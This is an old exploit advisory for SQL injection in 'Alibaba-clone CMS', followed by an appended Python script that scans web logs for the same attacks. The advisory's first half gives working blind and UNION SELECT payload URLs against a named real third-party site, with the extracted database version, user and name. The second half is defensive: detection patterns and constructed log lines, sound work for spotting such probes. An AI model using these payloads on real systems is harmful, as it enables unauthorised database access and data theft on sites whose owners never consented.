Alibabaclone CMS SQLbSQL Remote SQL Injection Vulnerabilities

# [+] Alibaba-clone CMS (SQL/bSQL) Remote SQL Injection

# [+] Author : 599eme Man
# [+] Contact : Flouf@live.fr
# [+] Download : http://blog.duslerim.net/cms/alibabacom-clone-new.html
# [+] Big Thanks to: Moudi :)

>> [+] Exploit :

http://www.site.com/path/supplier/view_contact_details.php?SellerID=(Blind) or (SQL)

http://www.site.com/path/category.php?IndustryID=(Blind) or (SQL)

>> [+] Demo BLIND:

http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=25 and 1=1 <= true
http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=25 and 1=2 <= false

http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=25 and 1=1+AND+SUBSTRING(@@version,1,1)=5 <= true
http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=25 and 1=1+AND+SUBSTRING(@@version,1,1)=4 <= false
The MySQL version is : 5

http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=25+and+1=1+union+select+1,2,version()--
See now: 5.0.45-community-nt

http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=25+and+1=1+union+select+1,2,user()--
Nadir_db@temp-webs

http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=25+and+1=1+union+select+1,2,database()--
nas04

>> [+] Demo SQL:

http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=18+union+select+1,2,version()--
The MySQL version is : 5

http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=18+union+select+1,2,user()--
Nadir_db@temp-webs

http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=18+union+select+1,2,database()--
nas04

Enjoy !!

# milw0rm.com [2009-07-20]
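The two injection points above both sit in parameters that should only ever carry an integer (SellerID, IndustryID), which makes them easy to watch for in web server logs. The following Python is an added defensive example, not part of the original advisory: it reads combined-format access log lines, decodes the query string the way PHP's $_GET would, and flags any value on those two parameters that is not a plain integer, labelling the boolean-blind probe pairs and UNION SELECT requests the demo shows. The install prefix (/alibaba-clone/), client IPs and log lines are constructed.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Integer-typed parameters of the two endpoints in the advisory, matched by path suffix.
INT_PARAMS = {"/category.php": {"IndustryID"},
              "/supplier/view_contact_details.php": {"SellerID"}}

# Client IP and request URI from an Apache/nginx combined-format access log line.
REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d"')
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.I)
BOOL_RE = re.compile(r"\b(?:and|or)\b\s*(?:\d+\s*=\s*\d+|substring\s*\(|@@version)", re.I)

def classify_value(value):
    """None for a clean integer (all these parameters should ever carry), else a label."""
    if value.strip().isdigit():
        return None
    if UNION_RE.search(value):
        return "union-based"     # e.g. "18 union select 1,2,version()--"
    if BOOL_RE.search(value):
        return "boolean-blind"   # e.g. the "25 and 1=1" / "25 and 1=2" probe pair
    return "non-integer"         # malformed either way; worth a look

def scan_line(line):
    """Return (client_ip, param, technique, decoded_value) findings for one log line."""
    m = REQ_RE.match(line)
    if not m:
        return []
    ip, uri = m.groups()
    parts = urlsplit(uri)
    watched = next((p for s, p in INT_PARAMS.items() if parts.path.endswith(s)), set())
    # parse_qsl decodes %XX escapes and turns '+' into spaces, as PHP's $_GET does.
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    found = [(name, value, classify_value(value)) for name, value in pairs if name in watched]
    return [(ip, n, t, v) for n, v, t in found if t]

def scan_log(lines):
    return [f for line in lines for f in scan_line(line)]

# Constructed sample log lines (documentation-range IPs) mirroring the advisory's requests.
LOG_LINES = [
    '203.0.113.7 - - [20/Jul/2009:10:01:03 +0000] "GET /alibaba-clone/category.php?IndustryID=25 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [20/Jul/2009:10:01:09 +0000] "GET /alibaba-clone/category.php?IndustryID=25+and+1=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [20/Jul/2009:10:01:11 +0000] "GET /alibaba-clone/category.php?IndustryID=25+and+1=2 HTTP/1.1" 200 2048',
    '203.0.113.7 - - [20/Jul/2009:10:01:20 +0000] "GET /alibaba-clone/category.php?IndustryID=25+and+1=1+AND+SUBSTRING(@@version,1,1)=5 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [20/Jul/2009:10:02:02 +0000] "GET /alibaba-clone/category.php?IndustryID=18+union+select+1,2,version()-- HTTP/1.1" 200 5300',
    '198.51.100.4 - - [20/Jul/2009:10:02:40 +0000] "GET /alibaba-clone/supplier/view_contact_details.php?SellerID=7 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    print(*scan_log(LOG_LINES), sep="\n")
```

The differing response sizes on the 1=1 / 1=2 pair (5120 vs 2048 bytes in the constructed lines) are the same signal the blind demo relies on, so a second pass correlating size by client and parameter is a natural extension.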